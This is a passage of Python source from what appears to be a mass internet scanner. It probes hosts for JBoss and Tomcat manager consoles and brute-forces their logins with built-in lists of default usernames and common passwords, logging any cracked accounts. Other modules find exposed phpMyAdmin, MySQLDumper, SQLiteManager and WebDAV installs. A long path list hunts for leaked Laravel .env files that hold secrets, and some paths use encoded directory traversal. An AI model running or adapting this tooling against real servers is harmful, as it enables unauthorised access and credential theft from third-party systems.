"/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} tadmins = ['admin', 'both', 'manager', 'role', 'role1' 'root', 'tomcat', 't0mcat'] tpasswords = ['', '102030', '112233', '123', '123123', '1234', '12345', '123456', '1234567', '12345678', '123456789', '1234567890', '1q2w3e4r', '321321', '654321', '666666', 'Password', 'Password1', 'Password12', 'Password123', 'abc123', 'access', 'admin', 'admin01','admin123', 'admin1234', 'admin123456', '[email protected]', 'adminadmin', 'blah', 'both', 'changethis', 'demo', 'demo123', 'hello', 'manager', 'pass', 'pass123', 'pass1234', 'passw0rd', 'password', 'password1', 'password12', 'password123', 'qwert', 'qwerty', 'qwertz', 'qwerty123', 'role', 'root', 's3cret', 'secret', 't0mcat', 'test', 'tomcat', 'toor', 'welcome', 'xmagico', 'zx321654xz'] main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): for tadmin in tadmins: for tpwd in tpasswords: tpwdx = tpwd.strip() if tools().http_basic_auth(target_url, tadmin, tpwdx)[0] == True: result_line += " Account:" + tadmin + "/" + tpwdx print "[*] JMX (BRUTED):" + target_url + " Login:" + tadmin + ":" + tpwdx tools().logging(__info__['log_bruted_result_file'], result_line) break else: print "[*] JMX Wrong Pass:" + target_url + " Login:" + tadmin + ":" + tpwdx else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_jmx3(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) # Brute modded by moep ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx3_secured.txt", "log_usec_result_file" : "log_jmx3_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx3.txt", "log_bruted_result_file" : "log_jmx3_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} tadmins = ['admin', 'both', 'manager', 'role', 'role1' 'root', 'tomcat', 't0mcat'] tpasswords = open('passwords_unix.txt', 'r').read().splitlines() main_url = tools().create_http_url(ip, port, file = "", prot = "http") for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): for tadmin in tadmins: for tpwd in tpasswords: if tools().http_basic_auth(target_url, tadmin, tpwd)[0] == True: result_line += " Account:" + tadmin + "/" + tpwd print "[*] JMX (BRUTED):" + target_url + " Login:" + tadmin + ":" + tpwd tools().logging(__info__['log_bruted_result_file'], result_line) break else: print "[*] JMX Wrong Pass:" + target_url + " Login:" + tadmin + ":" + tpwd else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknw_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknw_result_file'], result_line) def module_scan_mysqldumper(self, ip, port): ############################################################# # Scan Hosts for installed MySQLDumper and log them ############################################################# __info__ = {"name" : "mysqldumper", "log_usec_result_file" : "usec_result_msd.txt", "log_sec_result_file" : "sec_results_msd.txt", "log_unknwn_result_file" : "unknwn_results_msd.txt", "paths" : ["/Dumper", "/MSD", "/MySQL", "/MySQLDumper", "/dumper", "/msd", "/msd1.24.4", "/msd1.24stable", "/mySQLDumper", "/mySQLmanager", "/mySqlDumper", "/mysql", "/mysqldumper", "/sql", "/sqladmin", "/sqlmanager", "/sqlweb", "/websql"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured if target_return[3].find("<title>MySQLDumper</title>") != -1: print "[*] MSD (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] MSD (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_phpmyadmin(self, ip, port): ############################################################# # Scan Hosts for phpmyadmin and log them ############################################################# __info__ = {"name" : "phpmyadmin", "log_usec_result_file" : "usec_result_pma.txt", "log_sec_result_file" : "sec_results_pma.txt", "log_unknwn_result_file" : "unknwn_results_pma.txt", "paths" : ["/phpmyadmin", "/phpMyAdmin", "/mysql", "/sql", "/myadmin", "/phpMyAdmin-4.2.1-all-languages", "/phpMyAdmin-4.2.1-english", "/xampp/phpmyadmin", "/typo3/phpmyadmin", "/webadmin"], "mark_usec" : ["<li id=\"li_server_info\">Server: ", "src=\"navigation.php", "src=\"main.php"], "mark_sec" : ["www.phpmyadmin.net", "input_username", "pma_username", "pma_password", "src=\"main.php?token="], "mark_blacklist" : ["<?php", "<?"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured #print target_return[3] # Check with k not in ... mark_fuzzed that the pma is not fucked up ;) if any(k in target_return[3] for k in __info__['mark_usec']) and any(k not in target_return[3] for k in __info__['mark_blacklist']): print "[*] PMA (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) elif any(k in target_return[3] for k in __info__['mark_sec']) and any(k not in target_return[3] for k in __info__['mark_blacklist']): print "[*] PMA (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) else: print "[*] PMA (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] PMA (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_sqlitemanager(self, ip, port): ############################################################# # Scan for sqlitemanager and log them ############################################################# __info__ = {"name" : "sqlitemanager", "log_result_file" : "log_sqlitemanager.txt", "log_unknwn_result_file" : "unknwn_results_sqlitemanager.txt", "paths" : ["/sqlite", "/SQLite/SQLiteManager-1.2.4", "/SQLiteManager-1.2.4", "/sqlitemanager", "/SQlite", "/SQLiteManager"], "marks" : ["Create or add new database", "<h2 class=\"sqlmVersion\">Welcome to", "http://www.sqlitemanager.org"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/main.php" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[1] == 200: result_line = "%s Server: %s" %(target_url, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): sys.stdout.write("[*] Sqlitemanager: %s\n" %target_url) tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_webdav(self, ip, port): ############################################################# # Scan for webdav and log them ############################################################# __info__ = {"name" : "webdav", "log_result_file" : "log_webdav.txt", "log_unknwn_result_file" : "unknwn_results_webdav.txt", "paths" : ["/webdav"], "mark_xampp" : ["<b>WebDAV testpage</b>"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: if any(k in target_return[3] for k in __info__['mark_xampp']): print "[*] WebDAV (TRUE):", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] WebDAV (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_laravel(self, ip, port): ############################################################# #Scan for laravel by [email protected]@R-LightS ############################################################# __info__ = {"name" : "laravel", "log_result_file" : "log_laravel.txt", "log_unknwn_result_file" : "unknwn_results_laravel.txt", "paths" : [ "/.env", "/__tests__/test-become/.env", "/_static/.env", "/.c9/metadata/environment/.env", "/.docker/.env", "/.docker/laravel/app/.env", "/.env.backup", "/.env.dev", "/.env.development.local", "/.env.docker.dev", "/.env.example", "/.env.local", "/.env.php", "/.env.prod", "/.env.production.local", "/.env.sample.php", "/.env.save", "/.env.stage", "/.env.test", "/.env.test.local", "/.env~", "/.gitlab-ci/.env", "/.vscode/.env", "/3-sequelize/final/.env", "/07-accessing-data/begin/vue-heroes/.env", "/07-accessing-data/end/vue-heroes/.env", "/08-routing/begin/vue-heroes/.env", "/08-routing/end/vue-heroes/.env", "/09-managing-state/begin/vue-heroes/.env", "/09-managing-state/end/vue-heroes/.env", "/31_structure_tests/.env", "/acme_challenges/.env", "/acme-challenge/.env", "/acme/.env", "/actions-server/.env", "/admin-app/.env", "/admin/.env", "/adminer/.env", "/administrator/.env", "/agora/.env", "/alpha/.env", "/anaconda/.env", "/api/.env", "/api/src/.env", "/app_dir/.env", "/app_nginx_static_path/.env", "/app-order-client/.env", "/app/.env", "/app/client/.env", "/app/code/community/Nosto/Tagging/.env", "/app/config/.env", "/app/config/dev/.env", "/app/frontend/.env", "/app1-static/.env", "/app2-static/.env", "/apps/.env", "/apps/client/.env", "/Archipel/.env", "/asset_img/.env", "/assets/.env", "/Assignment3/.env", "/Assignment4/.env", "/audio/.env", "/awstats/.env", "/babel-plugin-dotenv/test/fixtures/as-alias/.env", "/babel-plugin-dotenv/test/fixtures/default/.env", "/babel-plugin-dotenv/test/fixtures/dev-env/.env", "/babel-plugin-dotenv/test/fixtures/empty-values/.env", "/babel-plugin-dotenv/test/fixtures/filename/.env", "/babel-plugin-dotenv/test/fixtures/override-value/.env", "/babel-plugin-dotenv/test/fixtures/prod-env/.env", "/back-end/app/.env", "/back/.env", "/backend/.env", "/backend/src/.env", "/backendfinaltest/.env", "/backup/.env", "/base_dir/.env", "/basic-network/.env", "/bgoldd/.env", "/bitcoind/.env", "/blankon/.env", "/blob/.env", "/blog/.env", "/blue/.env", "/bookchain-client/.env", "/bootstrap/.env", "/boxes/oracle-vagrant-boxes/ContainerRegistry/.env", "/boxes/oracle-vagrant-boxes/Kubernetes/.env", "/boxes/oracle-vagrant-boxes/OLCNE/.env", "/bucoffea/.env", "/build/.env", "/cardea/backend/.env", "/cdw-backend/.env", "/cgi-bin/.env", "/ch2-mytodo/.env", "/ch6-mytodo/.env", "/ch6a-mytodo/.env", "/ch7-mytodo/.env", "/ch7a-mytodo/.env", "/ch8-mytodo/.env", "/ch8a-mytodo/.env", "/ch8b-mytodo/.env", "/Chai/.env", "/challenge/.env", "/challenges/.env", "/charts/liveObjects/.env", "/chat-client/.env", "/chiminey/.env", "/client-app/.env", "/client/.env", "/client/mutual-fund-app/.env", "/client/src/.env", "/ClientApp/.env", "/clld_dir/.env", "/cmd/testdata/expected/dot_env/.env", "/code/api/.env", "/code/web/.env", "/CodeGolf.Web/ClientApp/.env", "/codenames-frontend/.env", "/collab-connect-web-application/server/.env", "/collected_static/.env", "/community/.env", "/conf/.env", "/config/.env", "/ContainerRegistry/.env", "/content/.env", "/core/.env", "/core/app/.env", "/core/Datavase/.env", "/core/persistence/.env", "/core/src/main/resources/org/jobrunr/dashboard/frontend/.env", "/counterblockd/.env", "/counterwallet/.env", "/cp/.env", "/cron/.env", "/cronlab/.env", "/cryo_project/.env", "/css/.env", "/custom/.env", "/d/.env", "/data/.env", "/database/.env", "/dataset1/.env", "/dataset2/.env", "/default/.env", "/delivery/.env", "/demo-app/.env", "/demo/.env", "/deploy/.env", "/developerslv/.env", "/development/.env", "/directories/.env", "/dist/.env", "/django_project_path/.env", "/django-blog/.env", "/django/.env", "/doc/.env", "/docker-compose/platform/.env", "/docker-elk/.env", "/docker-network-healthcheck/.env", "/docker-node-mongo-redis/.env", "/docker/.env", "/docker/app/.env", "/docker/compose/withMongo/.env", "/docker/compose/withPostgres/.env", "/docker/database/.env", "/docker/db/.env", "/docker/examples/compose/.env", "/docker/postgres/.env", "/docker/webdav/.env", "/docs/.env", "/dodoswap-client/.env", "/dotfiles/.env", "/download/.env", "/downloads/.env", "/e2e/.env", "/en/.env", "/engine/.env", "/env/.env", "/env/dockers/mariadb-test/.env", "/env/dockers/php-apache/.env", "/env/example/.env", "/env/template/.env", "/environments/local/.env", "/environments/production/.env", "/error/.env", "/errors/.env", "/example/.env", "/example02-golang-package/import-underscore/.env", "/example27-how-to-load-env/sample01/.env", "/example27-how-to-load-env/sample02/.env", "/examples/.env", "/examples/01-simple-model/.env", "/examples/02-complex-example/.env", "/examples/03-one-to-many-relationship/.env", "/examples/04-many-to-many-relationship/.env", "/examples/05-migrations/.env", "/examples/06-base-service/.env", "/examples/07-feature-flags/.env", "/examples/08-performance/.env", "/examples/09-production/.env", "/examples/10-subscriptions/.env", "/examples/11-transactions/.env", "/examples/drupal-separate-services/.env", "/examples/react-dashboard/backend/.env", "/examples/sdl-first/.env", "/examples/sdl-first/prisma/.env", "/examples/vue-dashboard/backend/.env", "/examples/web/.env", "/examples/with-cookie-auth-fauna/.env", "/examples/with-dotenv/.env", "/examples/with-firebase-authentication-serverless/.env", "/examples/with-react-relay-network-modern/.env", "/examples/with-relay-modern/.env", "/examples/with-universal-configuration-build-time/.env", "/exapi/.env", "/Exercise.Frontend/.env", "/Exercise.Frontend/train/.env", "/export/.env", "/fastlane/.env", "/favicons/.env", "/favs/.env", "/FE/huey/.env", "/fedex/.env", "/fhir-api/.env", "/files/.env", "/fileserver/.env", "/films/.env", "/Final_Project/Airflow_Dag/.env", "/Final_Project/kafka_twitter/.env", "/Final_Project/StartingFile/.env", "/finalVersion/lcomernbootcamp/projbackend/.env", "/FIRST_CONFIG/.env", "/first-network/.env", "/fisdom/fisdom/.env", "/fixtures/blocks/.env", "/fixtures/fiber-debugger/.env", "/fixtures/flight/.env", "/fixtures/kitchensink/.env", "/flask_test_uploads/.env", "/fm/.env", "/font-icons/.env", "/fonts/.env", "/front-app/.env", "/front-empathy/.env", "/front-end/.env", "/front/.env", "/front/src/.env", "/frontend/.env", "/frontend/momentum-fe/.env", "/frontend/react/.env", "/frontend/vue/.env", "/frontendfinaltest/.env", "/ftp/.env", "/ftpmaster/.env", "/gists/cache", "/gists/laravel", "/gists/pusher", "/github-connect/.env", "/grems-api/.env", "/grems-frontend/.env", "/Hash/.env", "/hasura/.env", "/Helmetjs/.env", "/hgs-static/.env", "/higlass-website/.env", "/home/.env", "/horde/.env", "/hotpot-app-frontend/.env", "/htdocs/.env", "/html/.env", "/http/.env", "/httpboot/.env", "/HUNIV_migration/.env", "/icon/.env", "/icons/.env", "/ikiwiki/.env", "/image_data/.env", "/Imagebord/.env", "/images/.env", "/img/.env", "/install/.env", "/InstantCV/server/.env", "/items/.env", "/javascript/.env", "/js-plugin/.env", "/js/.env", "/jsrelay/.env", "/jupyter/.env", "/khanlinks/.env", "/kibana/.env", "/kodenames-server/.env", "/kolab-syncroton/.env", "/Kubernetes/.env", "/lab/.env", "/laravel/.env", "/latest/.env", "/layout/.env", "/lcomernbootcamp/projbackend/.env", "/leafer-app/.env", "/ledger_sync/.env", "/legacy/tests/9.1.1", "/legacy/tests/9.2.0", "/legal/.env", "/lemonldap-ng-doc/.env", "/lemonldap-ng-fr-doc/.env", "/letsencrypt/.env", "/lib/.env", "/Library/.env", "/libs/.env", "/linux/.env", "/local/.env", "/log/.env", "/logging/.env", "/login/.env", "/mail/.env", "/mailinabox/.env", "/mailman/.env", "/main_user/.env", "/main/.env", "/manual/.env", "/master/.env", "/media/.env", "/memcached/.env", "/mentorg-lava-docker/.env", "/micro-app-react-communication/.env", "/micro-app-react/.env", "/mindsweeper/gui/.env", "/minified/.env", "/misc/.env", "/Modix/ClientApp/.env", "/monerod/.env", "/mongodb/config/dev/.env", "/monitoring/compose/.env", "/moodledata/.env", "/msks/.env", "/munki_repo/.env", "/music/.env", "/MyRentals.Web/ClientApp/.env", "/name/.env", "/new-js/.env", "/news-app/.env", "/nginx-server/.env", "/nginx/.env", "/niffler-frontend/.env", "/node_modules/.env", "/Nodejs-Projects/play-ground/login/.env", "/Nodejs-Projects/play-ground/ManageUserRoles/.env", "/noVNC/.env", "/Nuke.App.Ui/.env", "/oldsanta/.env", "/ops/vagrant/.env", "/option/.env", "/orientdb-client/.env", "/outputs/.env", "/owncloud/.env", "/packages/api/.env", "/packages/app/.env", "/packages/client/.env", "/packages/frontend/.env", "/packages/plugin-analytics/src/fixtures/analytics-ga-key/.env", "/packages/plugin-qiankun/examples/app1/.env", "/packages/plugin-qiankun/examples/app2/.env", "/packages/plugin-qiankun/examples/app3/.env", "/packages/plugin-qiankun/examples/master/.env", "/packages/react-scripts/fixtures/kitchensink/template/.env", "/packages/styled-ui-docs/.env", "/packages/web/.env", "/packed/.env", "/page-editor/.env", "/parity/.env", "/Passportjs/.env", "/patchwork/.env", "/path/.env", "/pfbe/.env", "/pictures/.env", "/playground/.env", "/plugin_static/.env", "/post-deployment/.vscode/.env", "/postfixadmin/.env", "/price_hawk_client/.env", "/prisma/.env", "/private/.env", "/processor/.env", "/prod/.env", "/projbackend/.env", "/project_root/.env", "/psnlink/.env", "/pt2/countries/src/.env", "/pt8/library-backend-gql/.env", "/pub/.env", "/public_html/.env", "/public_root/.env", "/public/.env", "/question2/.env", "/qv-frontend/.env", "/rabbitmq-cluster/.env", "/rails-api/react-app/.env", "/rasax/.env", "/react_todo/.env", "/redmine/.env", "/repo/.env", "/repos/.env", "/repository/.env", "/resources/.env", "/resources/docker/.env", "/resources/docker/mysql/.env", "/resources/docker/phpmyadmin/.env", "/resources/docker/rabbitmq/.env", "/resources/docker/rediscommander/.env", "/resourcesync/.env", "/rest/.env", "/restapi/.env", "/results/.env", "/robots/.env", "/root/.env", "/rosterBack/.env", "/roundcube/.env", "/roundcubemail/.env", "/routes/.env", "/run/.env", "/rust-backend/.env", "/rust-backend/dao/.env", "/s-with-me-front/.env", "/saas/.env", "/samples/chatroom/chatroom-spa/.env", "/samples/docker/deploymentscripts/.env", "/script/.env", "/scripts/.env", "/scripts/fvt/.env", "/selfish-darling-backend/.env", "/Serve_time_server/.env", "/serve-browserbench/.env", "/Server_with_db/.env", "/server/.env", "/server/config/.env", "/server/laravel/.env", "/server/src/persistence/.env", "/services/adminer/.env", "/services/deployment-agent/.env", "/services/documents/.env", "/services/graylog/.env", "/services/jaeger/.env", "/services/minio/.env", "/services/monitoring/.env", "/services/portainer/.env", "/services/redis-commander/.env", "/services/registry/.env", "/services/simcore/.env", "/services/traefik/.env", "/sessions/.env", "/shared/.env", "/shibboleth/.env", "/shop/.env", "/Simple_server/.env", "/site-library/.env", "/site/.env", "/sitemaps/.env", "/sites/.env", "/sitestatic/.env", "/Socketio/.env", "/sources/.env", "/Sources/API/.env", "/spearmint/.env", "/spikes/config-material-app/.env", "/SpotiApps/.env", "/src/__tests__/__fixtures__/instanceWithDependentSteps/.env", "/src/__tests__/__fixtures__/typeScriptIntegrationProject/.env", "/src/__tests__/__fixtures__/typeScriptProject/.env", "/src/__tests__/__fixtures__/typeScriptVisualizeProject/.env", "/src/.env", "/src/add-auth/express/.env", "/src/assembly/.env", "/src/character-service/.env", "/src/client/mobile/.env", "/src/core/tests/dotenv-files/.env", "/src/gameprovider-service/.env", "/src/main/front-end/.env", "/src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env", "/src/renderer/.env", "/srv6_controller/controller/.env", "/srv6_controller/examples/.env", "/srv6_controller/node-manager/.env", "/st-js-be-2020-movies-two/.env", "/stackato-pkg/.env", "/static_prod/.env", "/static_root/.env", "/static_user/.env", "/static-collected/.env", "/static-html/.env", "/static-root/.env", "/static/.env", "/staticfiles/.env", "/stats/.env", "/storage/.env", "/style/.env", "/styles/.env", "/stylesheets/.env", "/symfony/.env", "/system-config/.env", "/system/.env", "/target/.env", "/temanr9/.env", "/temanr10/.env", "/temp/.env", "/template/.env", "/templates/.env", "/test-network/.env", "/test-network/addOrg3/.env", "/test/.env", "/test/aries-js-worker/fixtures/.env", "/test/bdd/fixtures/adapter-rest/.env", "/test/bdd/fixtures/agent-rest/.env", "/test/bdd/fixtures/couchdb/.env", "/test/bdd/fixtures/demo/.env", "/test/bdd/fixtures/demo/openapi/.env", "/test/bdd/fixtures/did-method-rest/.env", "/test/bdd/fixtures/did-rest/.env", "/test/bdd/fixtures/edv-rest/.env", "/test/bdd/fixtures/openapi-demo/.env", "/test/bdd/fixtures/sidetree-mock/.env", "/test/bdd/fixtures/universalresolver/.env", "/test/bdd/fixtures/vc-rest/.env", "/test/fixtures/.env", "/test/fixtures/app_types/node/.env", "/test/fixtures/app_types/rails/.env", "/test/fixtures/node_path/.env", "/test/integration/env-config/app/.env", "/testfiles/.env", "/testing/docker/.env", "/tests/.env", "/Tests/Application/.env", "/tests/default_settings/v7.0/.env", "/tests/default_settings/v8.0/.env", "/tests/default_settings/v9.0/.env", "/tests/default_settings/v10.0/.env", "/tests/default_settings/v11.0/.env", "/tests/default_settings/v12.0/.env", "/tests/default_settings/v13.0/.env", "/tests/drupal-test/.env", "/tests/Integration/Environment/.env", "/tests/todo-react/.env", "/testwork_json/.env", "/theme_static/.env", "/theme/.env", "/thumb/.env", "/thumbs/.env", "/tiedostot/.env", "/tmp/.env", "/tools/.env", "/Travel_form/.env", "/ts/prime/.env", "/ubuntu/.env", "/ui/.env", "/unixtime/.env", "/unsplash-downloader/.env", "/upfiles/.env", "/upload/.env", "/uploads/.env", "/urlmem-app/.env", "/User_info/.env", "/v1/.env", "/v2/.env", "/var/backup/.env", "/vendor/.env", "/vendor/github.com/gobuffalo/envy/.env", "/vendor/github.com/subosito/gotenv/.env", "/videos/.env", "/vm-docker-compose/.env", "/vod_installer/.env", "/vue_CRM/.env", "/vue-end/vue-til/.env", "/vue/vuecli/.env", "/web-dist/.env", "/web/.env", "/Web/siteMariage/.env", "/webroot_path/.env", "/websocket/.env", "/webstatic/.env", "/webui/.env", "/well-known/.env", 